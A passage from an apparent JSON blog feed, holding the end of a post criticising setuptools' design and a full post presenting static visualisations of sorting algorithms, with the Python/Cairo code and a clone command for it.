Philosophy B restricts how you can use information\nstored on your own computer, violates your privacy, and puts the interests of\nsoftware makers ahead of that of the user. In corner A stands Richard Stallman,\nLinus Torvalds and Theo de Raadt, dressed in light and armed with flaming\nswords. In corner B, wreathed in shadow, stands Bill Gates, a cohort of ignorant\ngreedy politicians and a dark army of patent lawyers.<\/p>\n<p>It is against this epic background that I invite you to consider another player\non the side of darkness: <a\nhref=\"http:\/\/peak.telecommunity.com\/DevCenter\/setuptools\">setuptools<\/a>. No, I\ndon't think <a href=\"http:\/\/dirtsimple.org\/\">Phillip J. Eby<\/a> is out to take\ncontrol of your computer and leech your bank account details (though you might\nwell prefer this to his attempts to <a\nhref=\"http:\/\/dirtsimple.org\/2007\/02\/how-not-to-be-loser.html\">de-activate your\nloser circuit<\/a>). I surely do believe, though, that he thinks you are an\nidiot. Because setuptools, again and again, makes some decidedly Philosophy B\ndesign decisions. Witness:<\/p>\n<ul>\n<li>Setuptools is nosy. It deduces things magically from the version control\nsystem you use, so when you enter the Brave New World of <a href=\"\nhttp:\/\/git.or.cz\/\">distributed versioning<\/a>, all your build and\ndistribution scripts silently malfunction.<\/li>\n<li>Setuptools is needlessly opaque. <a\nhref=\"http:\/\/peak.telecommunity.com\/DevCenter\/PythonEggs\">Eggs<\/a> break\nsimple transparencies we currently take for granted - for example, we lose\nthe ability to trivially inspect installed libraries with a pager, or to\neasily list the contents of an installed module. They also complicate more\nsubtle things - because eggs are compressed, project data file access becomes\na pain. If you need direct file access, you need to use even MORE setuptools\nmagic to unpack project data files to a temporary directory.<\/li>\n<li>Setuptools is obstinate. 
It will automatically insert .eggs at the head of\nyour sys.path to make sure they get imported in preference to any existing\nlibraries. If I insert something into sys.path (say, for instance, to run a\ntest suite against the development version of my library), I do NOT want my\ndistribution mechanism to over-ride me. And no, using the setuptools\ndevelopment mode magic is not a satisfactory answer.<\/li>\n<\/ul>\n<p>This type of intrusive design is disrespectful to users.  Whenever you prefer to\ntrust your own imperfect guesses, rather than letting the user specify what they\nwant, you are disrespectful to your users. Whenever you needlessly make a system\nobscure to inspection, you are disrespectful to your users. Whenever you allow\nyour software to spill beyond its rightful bounds (by, for example, getting\nintimate with my version control system), you are disrespectful to your users.<\/p>\n<p>I believe that most people use setuptools because it provides a few simple\npieces of functionality that could easily be added to distutils without the\ndross and bad design. 
Grafting dependencies and better package data management\nonto distutils would go about 80% of the way to meeting my modest expectations.\nSadly, in one of those minor tragedies that life is so full of, it appears that\nsetuptools <a\nhref=\"http:\/\/mail.python.org\/pipermail\/python-dev\/2006-April\/063964.html\">wins\nby default<\/a>, simply because the problem domain is so goddamn boring that\nno-one else has bothered.<\/p>\n"},{"title":"Visualising Sorting Algorithms","published":"2007-04-27T00:00:00+00:00","updated":"2007-04-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/visualisingsorting\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/visualisingsorting\/","content":"<p><strong>Update<\/strong> See <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a> for many more visualisations!<\/p>\n<p>I dislike <a\nhref=\"http:\/\/ftp.csci.csusb.edu\/public\/class\/cs455\/cs455_2000\/java\/InsertionSortLauncher.html\">animated<\/a>\n<a href=\"http:\/\/www.cs.ubc.ca\/~harrison\/Java\/sorting-demo.html\">sorting<\/a> <a\nhref=\"http:\/\/www2.hawaii.edu\/~copley\/665\/HSApplet.html\">algorithm<\/a> <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Image:Sorting_heapsort_anim.gif\">visualisations<\/a> - there's too much of an air of hocus-pocus about them. Something\nimpressive and complicated happens on screen, but more often than not the\naudience is left mystified. I think their creators must also know that they\nhave precious little explanatory value, because the better ones are sexed up\nwith play-by-play doodles, added, one feels, as an apologetic afterthought by\nsome particularly dorky sportscaster. Nevertheless I've been unable to\nfind a single attempt to visualise a sorting algorithm statically (if you know\nof any, please drop me a line).<\/p>\n<p>So, presented below are the results of a pleasant evening with some nice Scotch\nand the third volume of Knuth. 
First, here's a taster - a static visualisation\nof heapsort:<\/p>\n<div class=\"media\">\n    <a href=\"heap.png\">\n        <img src=\"heap.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Heapsort\n    <\/div>\n    \n<\/div>\n<p>I think these simple static visualisations are much clearer than most animated\nattempts - and they have the added benefit of also being, to my not entirely\nunbiased eye, rather beautiful. You will find more visualisations, source code,\nand a tediously long explanation of why I bothered, after the jump.<\/p>\n<h2 id=\"the-problem\">The Problem<\/h2>\n<p>Before I go on, though, bear with me while I press home my point about\nanimation with a particularly heinous example of the genre. I found the\nfollowing specimen on the <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Bubblesort\">Wikipedia page for\nBubblesort<\/a>:<\/p>\n<div class=\"media\">\n    <a href=\"bubble_sort_animation.gif\">\n        <img src=\"bubble_sort_animation.gif\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bubblesort visualisation from Wikipedia\n    <\/div>\n    \n<\/div>\n<p>Now, it is my measured opinion that this animation has all the explanatory power\nof a glob of porridge flung against a wall. To see why I say this, try to find\nrough answers to the following set of simple questions with reference to it:<\/p>\n<ul>\n<li>After what percentage of time is half of the array sorted?<\/li>\n<li>Can you find an element that moved about half the length of the array to\nreach its final destination?<\/li>\n<li>What percentage of the array was sorted after 80% of the sorting process?\nHow about 20%?<\/li>\n<li>Does the number of sorted elements grow linearly or non-linearly with\ntime (i.e. logarithmically or exponentially)?<\/li>\n<\/ul>\n<p>If you thought that was harder than it needed to be, blame animation. First,\nwhile humans are great at estimating distances in space, they are pretty bad at\nestimating distances in time. 
This is why you had to watch the animation two or\nthree times to answer the first question. When we translate time to a geometric\nlength, as is done in any scientific diagram with a time dimension, this\nestimation process becomes easy. Second, many questions about sorting algorithms\nrequire us to actively compare the sorting state at two or more different time\npoints. Since we don't have perfect memories, this is very, very hard in all but\nthe simplest cases. This leaves us with a strangely one-dimensional view into an\nanimation - we can see what's on screen at any given moment, but we have to\nstrain to answer simple questions about, say, rates of change. Which is why the\nfinal question is hard to answer accurately.<\/p>\n<h2 id=\"finding-flatland\">Finding Flatland<\/h2>\n<p>It turns out that it is pretty easy to find a static, two-dimensional encoding\nfor the sorting process. The specific technique used here only works when the\nsorting algorithm is in-place, i.e. does not use any storage external to the\narray itself. Some of the algorithms below have been slightly modified from\ntheir standard forms to make sure they have this property. The magnitude of a\nnumber is indicated by shading - higher numbers are darker, and lower numbers\nare lighter. We begin on the left hand side with the numbers in a random order,\nand the sorting progression plays out until we reach the right hand side with a\nsorted sequence. Time, in this particular case, is measured by the number of\n\"swaps\" performed. This means that all swaps are equidistant on the diagram, and\nthat only a single swap occurs at any point in time.  When I refer to \"time\"\nwhen talking about these diagrams, I am therefore not referring to clock time.<\/p>\n<p>Now, I should be clear at the outset that I haven't tried to pack these\ndiagrams with as much information as possible. 
For example, I don't include\ntick marks for time units, nor do I explicitly mark algorithm details.\nInstead, I've simply tried to produce images that give a clear sense of the\n\"flow\" over time of the algorithms, while simultaneously not being an eyesore.\nI might produce some scaled-up annotated versions of the diagrams for some\nfuture post.<\/p>\n<h2 id=\"bubblesort\">Bubblesort<\/h2>\n<div class=\"media\">\n    <a href=\"bubble.png\">\n        <img src=\"bubble.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bubble sort\n    <\/div>\n    \n<\/div>\n<p>So, let's start with a static visualisation of <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Bubble_sort\">bubblesort<\/a>. Notice that,\neven without any labelling, we can \"read off\" the answers to all the questions\nposed above pretty trivially:<\/p>\n<ul>\n<li>The sorted portion of the sequence is clearly visible as a triangular\nblock in the bottom-right of the image, so we can easily locate the point\nat which half the array is sorted, and read off the percentage of time\ntaken.<\/li>\n<li>Since the start and end positions of each element are visible on the\ngraph, finding an element that moved about 50% of the length of the array\nis simple.<\/li>\n<li>Similarly, the percentage of the array that is sorted at 20% and 80% of\nthe process can just be read off.<\/li>\n<li>Lastly, we can clearly see that the curve of sorted elements is not\nlinear, but is probably close to n^2.<\/li>\n<\/ul>\n<p>Other features of the algorithm are also clearer - for instance, the famous\n\"rabbits\" and \"turtles\" are clearly identifiable. 
In the diagram the \"rabbits\"\nare the dark lines sweeping down to their positions rapidly, and the turtles\nare the lighter lines that gradually curve towards the top right of the image.<\/p>\n<h2 id=\"heapsort\">Heapsort<\/h2>\n<div class=\"media\">\n    <a href=\"heap.png\">\n        <img src=\"heap.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Heapsort\n    <\/div>\n    \n<\/div>\n<p>Now, let's return to the <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Heapsort\">heapsort<\/a> image at the top of\nthis article. First, a quick (and superficial) refresher on the algorithm\nitself:<\/p>\n<ul>\n<li>Step 1: Arrange the elements in the array to form a \"heap\" -\na data structure that allows us to find the largest element in constant\ntime.<\/li>\n<li>Step 2: Peel off the largest element, and move it to below the heap.<\/li>\n<li>Step 3: The heap is now disrupted, so we do some work to re-establish the\nheap property.<\/li>\n<li>Step 4: Repeat steps 2-3 until the entire array is sorted.<\/li>\n<\/ul>\n<p>Looking at the visualisation, we can see Step 1 clearly - it is the\nportion of the diagram before the point where the largest element in the\narray is slotted into place. After that, we can see a repeated pattern -\nthe heap is re-established and the greatest element is moved to below the\nheap again and again until the array is sorted.<\/p>\n<p>We can immediately make some quite sophisticated observations. For example, we\ncan see that although initially establishing the heap is costly,\nre-establishing it after the greatest element is removed requires an\napproximately constant amount of time throughout the sorting process - meaning\nthat the time required is relatively independent of the number of items still\nin the heap. This is an interesting property that is not immediately obvious\nfrom an analysis of the algorithm itself.<\/p>\n<p>Right - enough prattling! 
Here is a selection of other visualised algorithms\nfor your viewing pleasure:<\/p>\n<h2 id=\"quicksort\">Quicksort<\/h2>\n<div class=\"media\">\n    <a href=\"quick.png\">\n        <img src=\"quick.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Quicksort\n    <\/div>\n    \n<\/div><h2 id=\"selection-sort\">Selection Sort<\/h2>\n<div class=\"media\">\n    <a href=\"selection.png\">\n        <img src=\"selection.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Selection sort\n    <\/div>\n    \n<\/div><h2 id=\"insertion-sort\">Insertion Sort<\/h2>\n<div class=\"media\">\n    <a href=\"listinsertion.png\">\n        <img src=\"listinsertion.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Insertion sort\n    <\/div>\n    \n<\/div><h2 id=\"shell-sort\">Shell Sort<\/h2>\n<div class=\"media\">\n    <a href=\"shell.png\">\n        <img src=\"shell.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Shell sort\n    <\/div>\n    \n<\/div><h2 id=\"the-code\">The Code<\/h2>\n<p><a href=\"visualise.py\">visualise.py<\/a><\/p>\n<p>This whole thing started partly as an excuse to get familiar with the <a\nhref=\"http:\/\/cairographics.org\">Cairo<\/a> graphics library. It produces\nbeautiful, clean images, and appears to be both portable and well designed. It\nalso comes with a set of Python bindings that are maintained as part of the\nproject itself - a big plus in my books. 
Firefox 3 will use Cairo as its\nstandard rendering back end, which will instantly make it one of the most widely\nused vector graphics libraries out there.<\/p>\n<p>The examples on this page were generated using a command somewhat like the\nfollowing:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">.\/visualise.py<\/span><span style=\"color: #005CC5;\"> -l 6 -x 700 -y 300 -n 15<\/span><\/span><\/code><\/pre>\n<p><strong>Update 9\/8\/09<\/strong>: A newer version of the code is now available on <a\nhref=\"http:\/\/github.com\/cortesi\/sortvis\/tree\/master\">github<\/a>. You can check\nit out like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">git<\/span><span style=\"color: #032F62;\"> clone git:\/\/github.com\/cortesi\/sortvis.git<\/span><\/span><\/code><\/pre>"}]}